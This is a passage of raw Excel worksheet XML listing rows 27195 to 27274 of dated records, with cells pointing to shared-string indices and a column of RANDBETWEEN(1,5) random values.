      <c r="E27195" s="2" t="s">
        <v>24751</v>
      </c>
      <c r="F27195">
        <f t="shared" ca="1" si="424"/>
        <v>5</v>
      </c>
    </row>
    <row r="27196" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27196" s="1">
        <v>42892.370671296296</v>
      </c>
      <c r="C27196" t="s">
        <v>10</v>
      </c>
      <c r="D27196" t="s">
        <v>89</v>
      </c>
      <c r="E27196" t="s">
        <v>24752</v>
      </c>
      <c r="F27196">
        <f t="shared" ca="1" si="424"/>
        <v>4</v>
      </c>
    </row>
    <row r="27197" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27197" s="1">
        <v>42892.341261574074</v>
      </c>
      <c r="C27197" t="s">
        <v>222</v>
      </c>
      <c r="E27197" s="2" t="s">
        <v>24753</v>
      </c>
      <c r="F27197">
        <f t="shared" ca="1" si="424"/>
        <v>3</v>
      </c>
    </row>
    <row r="27198" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27198" s="1">
        <v>42892.310069444444</v>
      </c>
      <c r="C27198" t="s">
        <v>430</v>
      </c>
      <c r="E27198" t="s">
        <v>24754</v>
      </c>
      <c r="F27198">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27199" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27199" s="1">
        <v>42892.253634259258</v>
      </c>
      <c r="C27199" t="s">
        <v>41</v>
      </c>
      <c r="E27199" t="s">
        <v>24755</v>
      </c>
      <c r="F27199">
        <f t="shared" ca="1" si="424"/>
        <v>1</v>
      </c>
    </row>
    <row r="27200" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A27200" s="1">
        <v>42892.241967592592</v>
      </c>
      <c r="C27200" t="s">
        <v>197</v>
      </c>
      <c r="E27200" s="2" t="s">
        <v>24756</v>
      </c>
      <c r="F27200">
        <f t="shared" ca="1" si="424"/>
        <v>5</v>
      </c>
    </row>
    <row r="27201" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27201" s="1">
        <v>42892.227187500001</v>
      </c>
      <c r="C27201" t="s">
        <v>48</v>
      </c>
      <c r="E27201" t="s">
        <v>24757</v>
      </c>
      <c r="F27201">
        <f t="shared" ca="1" si="424"/>
        <v>2</v>
      </c>
    </row>
    <row r="27202" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27202" s="1">
        <v>42892.222708333335</v>
      </c>
      <c r="C27202" t="s">
        <v>65</v>
      </c>
      <c r="E27202" t="s">
        <v>24758</v>
      </c>
      <c r="F27202">
        <f t="shared" ref="F27202:F27265" ca="1" si="425">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="27203" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27203" s="1">
        <v>42892.200324074074</v>
      </c>
      <c r="C27203" t="s">
        <v>48</v>
      </c>
      <c r="E27203" s="2" t="s">
        <v>24759</v>
      </c>
      <c r="F27203">
        <f t="shared" ca="1" si="425"/>
        <v>1</v>
      </c>
    </row>
    <row r="27204" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27204" s="1">
        <v>42892.19462962963</v>
      </c>
      <c r="C27204" t="s">
        <v>134</v>
      </c>
      <c r="E27204" t="s">
        <v>24760</v>
      </c>
      <c r="F27204">
        <f t="shared" ca="1" si="425"/>
        <v>4</v>
      </c>
    </row>
    <row r="27205" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27205" s="1">
        <v>42892.144236111111</v>
      </c>
      <c r="C27205" t="s">
        <v>60</v>
      </c>
      <c r="E27205" t="s">
        <v>24761</v>
      </c>
      <c r="F27205">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27206" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27206" s="1">
        <v>42892.123888888891</v>
      </c>
      <c r="C27206" t="s">
        <v>139</v>
      </c>
      <c r="D27206" t="s">
        <v>2214</v>
      </c>
      <c r="E27206" s="2" t="s">
        <v>24727</v>
      </c>
      <c r="F27206">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27207" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27207" s="1">
        <v>42892.047164351854</v>
      </c>
      <c r="C27207" t="s">
        <v>41</v>
      </c>
      <c r="E27207" s="2" t="s">
        <v>24762</v>
      </c>
      <c r="F27207">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27208" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27208" s="1">
        <v>42892.047129629631</v>
      </c>
      <c r="C27208" t="s">
        <v>41</v>
      </c>
      <c r="E27208" s="2" t="s">
        <v>24762</v>
      </c>
      <c r="F27208">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27209" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27209" s="1">
        <v>42892.047083333331</v>
      </c>
      <c r="C27209" t="s">
        <v>41</v>
      </c>
      <c r="E27209" s="2" t="s">
        <v>24762</v>
      </c>
      <c r="F27209">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27210" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27210" s="1">
        <v>42892.045567129629</v>
      </c>
      <c r="C27210" t="s">
        <v>41</v>
      </c>
      <c r="E27210" s="2" t="s">
        <v>24762</v>
      </c>
      <c r="F27210">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27211" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27211" s="1">
        <v>42892.042291666665</v>
      </c>
      <c r="C27211" t="s">
        <v>41</v>
      </c>
      <c r="F27211">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27212" s="1">
        <v>42891.842245370368</v>
      </c>
      <c r="C27212" t="s">
        <v>10</v>
      </c>
      <c r="D27212" t="s">
        <v>6</v>
      </c>
      <c r="E27212" t="s">
        <v>24763</v>
      </c>
      <c r="F27212">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27213" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27213" s="1">
        <v>42891.709363425929</v>
      </c>
      <c r="C27213" t="s">
        <v>10</v>
      </c>
      <c r="D27213" t="s">
        <v>36</v>
      </c>
      <c r="E27213" t="s">
        <v>24764</v>
      </c>
      <c r="F27213">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27214" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27214" s="1">
        <v>42891.707800925928</v>
      </c>
      <c r="C27214" t="s">
        <v>10</v>
      </c>
      <c r="D27214" t="s">
        <v>163</v>
      </c>
      <c r="E27214" t="s">
        <v>24765</v>
      </c>
      <c r="F27214">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27215" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27215" s="1">
        <v>42891.680821759262</v>
      </c>
      <c r="C27215" t="s">
        <v>6</v>
      </c>
      <c r="D27215" t="s">
        <v>194</v>
      </c>
      <c r="E27215" s="2" t="s">
        <v>24766</v>
      </c>
      <c r="F27215">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27216" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27216" s="1">
        <v>42891.663900462961</v>
      </c>
      <c r="C27216" t="s">
        <v>10</v>
      </c>
      <c r="D27216" t="s">
        <v>20</v>
      </c>
      <c r="E27216" s="2" t="s">
        <v>24767</v>
      </c>
      <c r="F27216">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27217" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27217" s="1">
        <v>42891.661458333336</v>
      </c>
      <c r="C27217" t="s">
        <v>10</v>
      </c>
      <c r="D27217" t="s">
        <v>6</v>
      </c>
      <c r="E27217" t="s">
        <v>24768</v>
      </c>
      <c r="F27217">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27218" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27218" s="1">
        <v>42891.642361111109</v>
      </c>
      <c r="C27218" t="s">
        <v>10</v>
      </c>
      <c r="D27218" t="s">
        <v>6</v>
      </c>
      <c r="E27218" t="s">
        <v>24769</v>
      </c>
      <c r="F27218">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27219" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27219" s="1">
        <v>42891.636574074073</v>
      </c>
      <c r="C27219" t="s">
        <v>623</v>
      </c>
      <c r="E27219" s="2" t="s">
        <v>24770</v>
      </c>
      <c r="F27219">
        <f t="shared" ca="1" si="425"/>
        <v>4</v>
      </c>
    </row>
    <row r="27220" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27220" s="1">
        <v>42891.612719907411</v>
      </c>
      <c r="C27220" t="s">
        <v>71</v>
      </c>
      <c r="E27220" s="2" t="s">
        <v>24771</v>
      </c>
      <c r="F27220">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27221" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27221" s="1">
        <v>42891.608206018522</v>
      </c>
      <c r="C27221" t="s">
        <v>10</v>
      </c>
      <c r="D27221" t="s">
        <v>89</v>
      </c>
      <c r="E27221" t="s">
        <v>24772</v>
      </c>
      <c r="F27221">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27222" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27222" s="1">
        <v>42891.602430555555</v>
      </c>
      <c r="C27222" t="s">
        <v>4970</v>
      </c>
      <c r="E27222" s="2" t="s">
        <v>24773</v>
      </c>
      <c r="F27222">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27223" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27223" s="1">
        <v>42891.53497685185</v>
      </c>
      <c r="C27223" t="s">
        <v>260</v>
      </c>
      <c r="E27223" s="2" t="s">
        <v>24774</v>
      </c>
      <c r="F27223">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27224" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27224" s="1">
        <v>42891.515300925923</v>
      </c>
      <c r="C27224" t="s">
        <v>10</v>
      </c>
      <c r="D27224" t="s">
        <v>89</v>
      </c>
      <c r="E27224" t="s">
        <v>24775</v>
      </c>
      <c r="F27224">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27225" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27225" s="1">
        <v>42891.507951388892</v>
      </c>
      <c r="C27225" t="s">
        <v>10</v>
      </c>
      <c r="D27225" t="s">
        <v>192</v>
      </c>
      <c r="E27225" t="s">
        <v>24776</v>
      </c>
      <c r="F27225">
        <f t="shared" ca="1" si="425"/>
        <v>4</v>
      </c>
    </row>
    <row r="27226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27226" s="1">
        <v>42891.502870370372</v>
      </c>
      <c r="C27226" t="s">
        <v>10</v>
      </c>
      <c r="D27226" t="s">
        <v>36</v>
      </c>
      <c r="E27226" t="s">
        <v>24777</v>
      </c>
      <c r="F27226">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27227" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27227" s="1">
        <v>42891.499861111108</v>
      </c>
      <c r="C27227" t="s">
        <v>6</v>
      </c>
      <c r="D27227" t="s">
        <v>25</v>
      </c>
      <c r="E27227" t="s">
        <v>24778</v>
      </c>
      <c r="F27227">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27228" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27228" s="1">
        <v>42891.480821759258</v>
      </c>
      <c r="C27228" t="s">
        <v>6</v>
      </c>
      <c r="D27228" t="s">
        <v>25</v>
      </c>
      <c r="E27228" t="s">
        <v>24779</v>
      </c>
      <c r="F27228">
        <f t="shared" ca="1" si="425"/>
        <v>4</v>
      </c>
    </row>
    <row r="27229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27229" s="1">
        <v>42891.452499999999</v>
      </c>
      <c r="C27229" t="s">
        <v>16</v>
      </c>
      <c r="E27229" t="s">
        <v>24780</v>
      </c>
      <c r="F27229">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27230" s="1">
        <v>42891.438877314817</v>
      </c>
      <c r="C27230" t="s">
        <v>10</v>
      </c>
      <c r="D27230" t="s">
        <v>336</v>
      </c>
      <c r="E27230" t="s">
        <v>24781</v>
      </c>
      <c r="F27230">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27231" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27231" s="1">
        <v>42891.437974537039</v>
      </c>
      <c r="C27231" t="s">
        <v>6</v>
      </c>
      <c r="D27231" t="s">
        <v>7</v>
      </c>
      <c r="E27231" s="2" t="s">
        <v>24782</v>
      </c>
      <c r="F27231">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27232" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27232" s="1">
        <v>42891.386307870373</v>
      </c>
      <c r="C27232" t="s">
        <v>318</v>
      </c>
      <c r="E27232" t="s">
        <v>24783</v>
      </c>
      <c r="F27232">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27233" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27233" s="1">
        <v>42891.377951388888</v>
      </c>
      <c r="C27233" t="s">
        <v>65</v>
      </c>
      <c r="E27233" s="2" t="s">
        <v>24784</v>
      </c>
      <c r="F27233">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27234" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27234" s="1">
        <v>42891.32435185185</v>
      </c>
      <c r="C27234" t="s">
        <v>10</v>
      </c>
      <c r="D27234" t="s">
        <v>36</v>
      </c>
      <c r="E27234" t="s">
        <v>24785</v>
      </c>
      <c r="F27234">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27235" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27235" s="1">
        <v>42891.277858796297</v>
      </c>
      <c r="C27235" t="s">
        <v>41</v>
      </c>
      <c r="E27235" s="2" t="s">
        <v>24786</v>
      </c>
      <c r="F27235">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27236" s="1">
        <v>42891.19635416667</v>
      </c>
      <c r="C27236" t="s">
        <v>41</v>
      </c>
      <c r="E27236" t="s">
        <v>24787</v>
      </c>
      <c r="F27236">
        <f t="shared" ca="1" si="425"/>
        <v>4</v>
      </c>
    </row>
    <row r="27237" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27237" s="1">
        <v>42890.915300925924</v>
      </c>
      <c r="C27237" t="s">
        <v>139</v>
      </c>
      <c r="E27237" t="s">
        <v>24788</v>
      </c>
      <c r="F27237">
        <f t="shared" ca="1" si="425"/>
        <v>4</v>
      </c>
    </row>
    <row r="27238" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27238" s="1">
        <v>42890.891076388885</v>
      </c>
      <c r="C27238" t="s">
        <v>410</v>
      </c>
      <c r="E27238" t="s">
        <v>24789</v>
      </c>
      <c r="F27238">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27239" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27239" s="1">
        <v>42890.736145833333</v>
      </c>
      <c r="C27239" t="s">
        <v>10</v>
      </c>
      <c r="D27239" t="s">
        <v>271</v>
      </c>
      <c r="F27239">
        <f t="shared" ca="1" si="425"/>
        <v>1</v>
      </c>
    </row>
    <row r="27240" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27240" s="1">
        <v>42890.655729166669</v>
      </c>
      <c r="C27240" t="s">
        <v>10</v>
      </c>
      <c r="D27240" t="s">
        <v>271</v>
      </c>
      <c r="E27240" t="s">
        <v>24790</v>
      </c>
      <c r="F27240">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27241" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27241" s="1">
        <v>42890.428530092591</v>
      </c>
      <c r="C27241" t="s">
        <v>10</v>
      </c>
      <c r="D27241" t="s">
        <v>89</v>
      </c>
      <c r="E27241" t="s">
        <v>24791</v>
      </c>
      <c r="F27241">
        <f t="shared" ca="1" si="425"/>
        <v>1</v>
      </c>
    </row>
    <row r="27242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27242" s="1">
        <v>42890.118298611109</v>
      </c>
      <c r="C27242" t="s">
        <v>41</v>
      </c>
      <c r="E27242" t="s">
        <v>24792</v>
      </c>
      <c r="F27242">
        <f t="shared" ca="1" si="425"/>
        <v>1</v>
      </c>
    </row>
    <row r="27243" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27243" s="1">
        <v>42889.502002314817</v>
      </c>
      <c r="C27243" t="s">
        <v>10</v>
      </c>
      <c r="D27243" t="s">
        <v>178</v>
      </c>
      <c r="E27243" s="2" t="s">
        <v>24793</v>
      </c>
      <c r="F27243">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27244" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27244" s="1">
        <v>42889.382453703707</v>
      </c>
      <c r="C27244" t="s">
        <v>10</v>
      </c>
      <c r="D27244" t="s">
        <v>6</v>
      </c>
      <c r="E27244" s="2" t="s">
        <v>24794</v>
      </c>
      <c r="F27244">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27245" s="1">
        <v>42889.301863425928</v>
      </c>
      <c r="C27245" t="s">
        <v>471</v>
      </c>
      <c r="E27245" t="s">
        <v>24795</v>
      </c>
      <c r="F27245">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27246" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27246" s="1">
        <v>42889.196828703702</v>
      </c>
      <c r="C27246" t="s">
        <v>845</v>
      </c>
      <c r="E27246" s="2" t="s">
        <v>24796</v>
      </c>
      <c r="F27246">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27247" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27247" s="1">
        <v>42888.819432870368</v>
      </c>
      <c r="C27247" t="s">
        <v>6</v>
      </c>
      <c r="D27247" t="s">
        <v>821</v>
      </c>
      <c r="E27247" s="2" t="s">
        <v>24797</v>
      </c>
      <c r="F27247">
        <f t="shared" ca="1" si="425"/>
        <v>4</v>
      </c>
    </row>
    <row r="27248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27248" s="1">
        <v>42888.694027777776</v>
      </c>
      <c r="C27248" t="s">
        <v>10</v>
      </c>
      <c r="D27248" t="s">
        <v>46</v>
      </c>
      <c r="E27248" t="s">
        <v>24798</v>
      </c>
      <c r="F27248">
        <f t="shared" ca="1" si="425"/>
        <v>1</v>
      </c>
    </row>
    <row r="27249" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27249" s="1">
        <v>42888.672673611109</v>
      </c>
      <c r="C27249" t="s">
        <v>10</v>
      </c>
      <c r="D27249" t="s">
        <v>39</v>
      </c>
      <c r="E27249" s="2" t="s">
        <v>24799</v>
      </c>
      <c r="F27249">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27250" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27250" s="1">
        <v>42888.655428240738</v>
      </c>
      <c r="C27250" t="s">
        <v>10</v>
      </c>
      <c r="D27250" t="s">
        <v>36</v>
      </c>
      <c r="E27250" s="2" t="s">
        <v>24800</v>
      </c>
      <c r="F27250">
        <f t="shared" ca="1" si="425"/>
        <v>1</v>
      </c>
    </row>
    <row r="27251" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27251" s="1">
        <v>42888.58829861111</v>
      </c>
      <c r="C27251" t="s">
        <v>10</v>
      </c>
      <c r="D27251" t="s">
        <v>244</v>
      </c>
      <c r="E27251" s="2" t="s">
        <v>24801</v>
      </c>
      <c r="F27251">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27252" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27252" s="1">
        <v>42888.585844907408</v>
      </c>
      <c r="C27252" t="s">
        <v>6</v>
      </c>
      <c r="D27252" t="s">
        <v>194</v>
      </c>
      <c r="E27252" t="s">
        <v>24802</v>
      </c>
      <c r="F27252">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27253" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27253" s="1">
        <v>42888.546990740739</v>
      </c>
      <c r="C27253" t="s">
        <v>10</v>
      </c>
      <c r="D27253" t="s">
        <v>23</v>
      </c>
      <c r="E27253" s="2" t="s">
        <v>24803</v>
      </c>
      <c r="F27253">
        <f t="shared" ca="1" si="425"/>
        <v>5</v>
      </c>
    </row>
    <row r="27254" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27254" s="1">
        <v>42888.546863425923</v>
      </c>
      <c r="C27254" t="s">
        <v>260</v>
      </c>
      <c r="E27254" t="s">
        <v>24804</v>
      </c>
      <c r="F27254">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27255" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27255" s="1">
        <v>42888.493125000001</v>
      </c>
      <c r="C27255" t="s">
        <v>6</v>
      </c>
      <c r="D27255" t="s">
        <v>821</v>
      </c>
      <c r="E27255" s="2" t="s">
        <v>24805</v>
      </c>
      <c r="F27255">
        <f t="shared" ca="1" si="425"/>
        <v>4</v>
      </c>
    </row>
    <row r="27256" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27256" s="1">
        <v>42888.46634259259</v>
      </c>
      <c r="C27256" t="s">
        <v>10</v>
      </c>
      <c r="D27256" t="s">
        <v>52</v>
      </c>
      <c r="E27256" t="s">
        <v>24806</v>
      </c>
      <c r="F27256">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27257" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27257" s="1">
        <v>42888.453796296293</v>
      </c>
      <c r="C27257" t="s">
        <v>10</v>
      </c>
      <c r="D27257" t="s">
        <v>80</v>
      </c>
      <c r="E27257" t="s">
        <v>24807</v>
      </c>
      <c r="F27257">
        <f t="shared" ca="1" si="425"/>
        <v>2</v>
      </c>
    </row>
    <row r="27258" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27258" s="1">
        <v>42888.385034722225</v>
      </c>
      <c r="C27258" t="s">
        <v>10</v>
      </c>
      <c r="D27258" t="s">
        <v>151</v>
      </c>
      <c r="E27258" t="s">
        <v>24808</v>
      </c>
      <c r="F27258">
        <f t="shared" ca="1" si="425"/>
        <v>4</v>
      </c>
    </row>
    <row r="27259" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A27259" s="1">
        <v>42888.355636574073</v>
      </c>
      <c r="C27259" t="s">
        <v>71</v>
      </c>
      <c r="E27259" s="2" t="s">
        <v>24809</v>
      </c>
      <c r="F27259">
        <f t="shared" ca="1" si="425"/>
        <v>1</v>
      </c>
    </row>
    <row r="27260" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27260" s="1">
        <v>42888.327534722222</v>
      </c>
      <c r="C27260" t="s">
        <v>73</v>
      </c>
      <c r="E27260" t="s">
        <v>24810</v>
      </c>
      <c r="F27260">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27261" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27261" s="1">
        <v>42888.24795138889</v>
      </c>
      <c r="C27261" t="s">
        <v>124</v>
      </c>
      <c r="E27261" s="2" t="s">
        <v>24811</v>
      </c>
      <c r="F27261">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27262" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A27262" s="1">
        <v>42888.239236111112</v>
      </c>
      <c r="C27262" t="s">
        <v>71</v>
      </c>
      <c r="E27262" s="2" t="s">
        <v>24812</v>
      </c>
      <c r="F27262">
        <f t="shared" ca="1" si="425"/>
        <v>1</v>
      </c>
    </row>
    <row r="27263" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27263" s="1">
        <v>42888.162685185183</v>
      </c>
      <c r="C27263" t="s">
        <v>60</v>
      </c>
      <c r="E27263" s="2" t="s">
        <v>24813</v>
      </c>
      <c r="F27263">
        <f t="shared" ca="1" si="425"/>
        <v>3</v>
      </c>
    </row>
    <row r="27264" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27264" s="1">
        <v>42888.152581018519</v>
      </c>
      <c r="C27264" t="s">
        <v>776</v>
      </c>
      <c r="E27264" s="2" t="s">
        <v>24814</v>
      </c>
      <c r="F27264">
        <f t="shared" ca="1" si="425"/>
        <v>1</v>
      </c>
    </row>
    <row r="27265" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27265" s="1">
        <v>42888.128692129627</v>
      </c>
      <c r="C27265" t="s">
        <v>41</v>
      </c>
      <c r="E27265" t="s">
        <v>24815</v>
      </c>
      <c r="F27265">
        <f t="shared" ca="1" si="425"/>
        <v>1</v>
      </c>
    </row>
    <row r="27266" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27266" s="1">
        <v>42888.071516203701</v>
      </c>
      <c r="C27266" t="s">
        <v>124</v>
      </c>
      <c r="E27266" s="2" t="s">
        <v>24816</v>
      </c>
      <c r="F27266">
        <f t="shared" ref="F27266:F27329" ca="1" si="426">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="27267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27267" s="1">
        <v>42887.903564814813</v>
      </c>
      <c r="C27267" t="s">
        <v>140</v>
      </c>
      <c r="D27267" t="s">
        <v>234</v>
      </c>
      <c r="E27267" t="s">
        <v>24817</v>
      </c>
      <c r="F27267">
        <f t="shared" ca="1" si="426"/>
        <v>3</v>
      </c>
    </row>
    <row r="27268" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27268" s="1">
        <v>42887.797395833331</v>
      </c>
      <c r="C27268" t="s">
        <v>10</v>
      </c>
      <c r="D27268" t="s">
        <v>107</v>
      </c>
      <c r="E27268" t="s">
        <v>24818</v>
      </c>
      <c r="F27268">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27269" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27269" s="1">
        <v>42887.779745370368</v>
      </c>
      <c r="C27269" t="s">
        <v>10</v>
      </c>
      <c r="D27269" t="s">
        <v>381</v>
      </c>
      <c r="E27269" s="2" t="s">
        <v>24819</v>
      </c>
      <c r="F27269">
        <f t="shared" ca="1" si="426"/>
        <v>3</v>
      </c>
    </row>
    <row r="27270" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27270" s="1">
        <v>42887.673564814817</v>
      </c>
      <c r="C27270" t="s">
        <v>10</v>
      </c>
      <c r="D27270" t="s">
        <v>36</v>
      </c>
      <c r="E27270" t="s">
        <v>24820</v>
      </c>
      <c r="F27270">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27271" s="1">
        <v>42887.672372685185</v>
      </c>
      <c r="C27271" t="s">
        <v>10</v>
      </c>
      <c r="D27271" t="s">
        <v>271</v>
      </c>
      <c r="E27271" t="s">
        <v>24821</v>
      </c>
      <c r="F27271">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27272" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A27272" s="1">
        <v>42887.659490740742</v>
      </c>
      <c r="C27272" t="s">
        <v>10</v>
      </c>
      <c r="D27272" t="s">
        <v>23</v>
      </c>
      <c r="E27272" s="2" t="s">
        <v>24822</v>
      </c>
      <c r="F27272">
        <f t="shared" ca="1" si="426"/>
        <v>1</v>
      </c>
    </row>
    <row r="27273" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27273" s="1">
        <v>42887.646805555552</v>
      </c>
      <c r="C27273" t="s">
        <v>10</v>
      </c>
      <c r="D27273" t="s">
        <v>17</v>
      </c>
      <c r="E27273" t="s">
        <v>24823</v>
      </c>
      <c r="F27273">
        <f t="shared" ca="1" si="426"/>
        <v>1</v>
      </c>
    </row>
    <row r="27274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27274" s="1">
        <v>42887.601458333331</v>
      </c>
      <c r="C27274" t="s">
        <v>10</v>
      </c>
      <c r="D27274" t="s">
        <v>290</v>
      </c>
